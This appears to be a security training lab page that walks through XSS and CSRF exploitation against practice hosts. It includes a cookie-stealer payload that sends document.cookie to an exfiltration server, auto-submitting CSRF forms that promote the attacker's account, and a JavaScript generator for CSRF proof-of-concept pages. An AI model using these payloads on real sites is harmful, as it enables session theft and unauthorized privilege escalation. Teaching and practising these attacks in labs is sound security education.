Advanced XSS and CSRF Exploitation  

Lab Warmup


After discussing the lab components, let us explore how we can use them to exploit a couple of sample vulnerabilities.


XSS Warm-Up

Our sample web application is a simple guestbook allowing us to leave entries, which all users can view. An administrator frequently monitors the entries to address spam:

We can confirm an obvious XSS vulnerability by posting the following entry:

<script>alert(1)</script>

Let us develop an exploit to steal the admin user's cookies. For exploit development, we host the script on the exploit server and post a guestbook entry that loads it from there:

<script src="http://exploitserver.htb/exploit"></script>

Afterward, we can create a cookie stealer payload like the following on the exploit server. To exfiltrate the cookie, we can use the exfiltration server:

window.location = "http://exfiltrate.htb/cookiestealer?c=" + document.cookie;

After saving the exploit, we can confirm that it has been saved by accessing the /exploit endpoint:


Lastly, we must wait for the admin user to access the guestbook. The injected XSS payload causes the admin's browser to load the payload from the exploit server, which will exfiltrate the admin user's cookies to the exfiltration server. Accessing the exfiltration server's log at the /log endpoint reveals the exfiltrated cookies:


CSRF Warm-Up

The sample web application does not contain much functionality as it is still under construction:

We only have user permissions, but there is a Promote button. Pressing it, the application tells us that only administrators can promote other users. The request it sends, however, reveals how the promotion is implemented:


This endpoint has no CSRF protection: the request is a plain GET with no anti-CSRF token, so we can mount a CSRF attack that makes an administrator promote our user. To do so, we create an HTML form that reproduces the promotion request:

<html>
  <body>
    <form method="GET" action="http://csrf.vulnerablesite.htb/profile.php">
      <input type="hidden" name="promote" value="htb-stdnt" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Since we do not want the attack to require additional user interaction, we will add JavaScript code that automatically submits the form once the page is loaded:

<script>
  document.forms[0].submit();
</script>

Combining these two parts results in the following payload, which we will save in the exploitserver at exploitserver.htb:

<html>
  <body>
    <form method="GET" action="http://csrf.vulnerablesite.htb/profile.php">
      <input type="hidden" name="promote" value="htb-stdnt" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

We can test our exploit by clicking View Exploit while logged in to the vulnerable application. This results in a request to http://exploitserver.htb/exploit, which returns our saved payload. The payload auto-submits the form, creating a cross-origin request to the vulnerable web application. Since we are not an administrator, the promotion fails:

Even so, the failure confirms that our CSRF payload sent the promotion request. To execute the attack, we deliver our payload to the victim, who then accesses http://exploitserver.htb/exploit. After waiting a few seconds and refreshing the page, we are promoted to admin:

Thus, we successfully exploited the CSRF vulnerability to make the administrator victim promote our user.
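Building the form by hand works for one GET parameter; for requests with several fields, or POST bodies, it is easier to generate the page from the captured request. The following is an added example (not the lab's code) of that generator, going beyond the GET case shown above to urlencoded POST bodies as well. The sample request is constructed to match the lab; in practice the raw request comes from the proxy.

```javascript
// Added example, not part of the lab: turn a captured HTTP request into an
// auto-submitting CSRF proof-of-concept page like the one built above.

// Constructed sample, shaped like the promotion request captured in the lab.
const SAMPLE_REQUEST = [
  'GET /profile.php?promote=htb-stdnt HTTP/1.1',
  'Host: csrf.vulnerablesite.htb',
  'Cookie: PHPSESSID=constructed-value',
  '',
  '',
].join('\r\n');

// Parse the request line, the Host header and, for POST, the urlencoded body.
// Returns { method, action, params } ready for buildCsrfPoc().
function parseRequest(raw) {
  const [head, body = ''] = raw.split('\r\n\r\n');
  const lines = head.split('\r\n');
  const [method, target] = lines[0].split(' ');
  const hostLine = lines.slice(1).find(l => /^host:/i.test(l));
  const host = hostLine ? hostLine.slice(hostLine.indexOf(':') + 1).trim() : '';
  const url = new URL(target, 'http://' + host);
  // GET parameters become hidden inputs; for POST they stay in the action URL
  // and the body fields become the inputs instead.
  const source = method === 'POST' ? body : url.search;
  const action = url.origin + url.pathname + (method === 'POST' ? url.search : '');
  return { method, action, params: Object.fromEntries(new URLSearchParams(source)) };
}

// Attribute-escape a value so a parameter containing quotes or angle brackets
// cannot break out of the generated <input> tag.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Emit the same structure as the hand-written page: one hidden input per
// parameter and a script that submits the form on load.
function buildCsrfPoc({ method, action, params }) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `      <input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}" />`)
    .join('\n');
  return [
    '<html>',
    '  <body>',
    `    <form method="${escapeAttr(method)}" action="${escapeAttr(action)}">`,
    inputs,
    '    </form>',
    '    <script>',
    '      document.forms[0].submit();',
    '    </script>',
    '  </body>',
    '</html>',
  ].join('\n');
}

// Usage: paste the output into the exploit server as /exploit.
console.log(buildCsrfPoc(parseRequest(SAMPLE_REQUEST)));
```

The method matters more than it looks: a session cookie with SameSite=Lax is still attached to a top-level GET navigation like the auto-submitted form here, but not to a cross-site POST, so a POST-based endpoint behind a Lax cookie will not be exploitable this way even without a token.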

Note: In all labs in this module, there is a simulated victim user. This victim user may take some time to access the payload. So, make sure your payload works by testing it yourself, and please be patient and wait a couple of minutes for the victim to trigger the exploit.


vHosts needed for these questions:
  • exfiltrate.htb
  • exploitserver.htb
  • xss.vulnerablesite.htb
  • csrf.vulnerablesite.htb

Authenticate to with user "htb-stdnt" and password "Academy_student!"
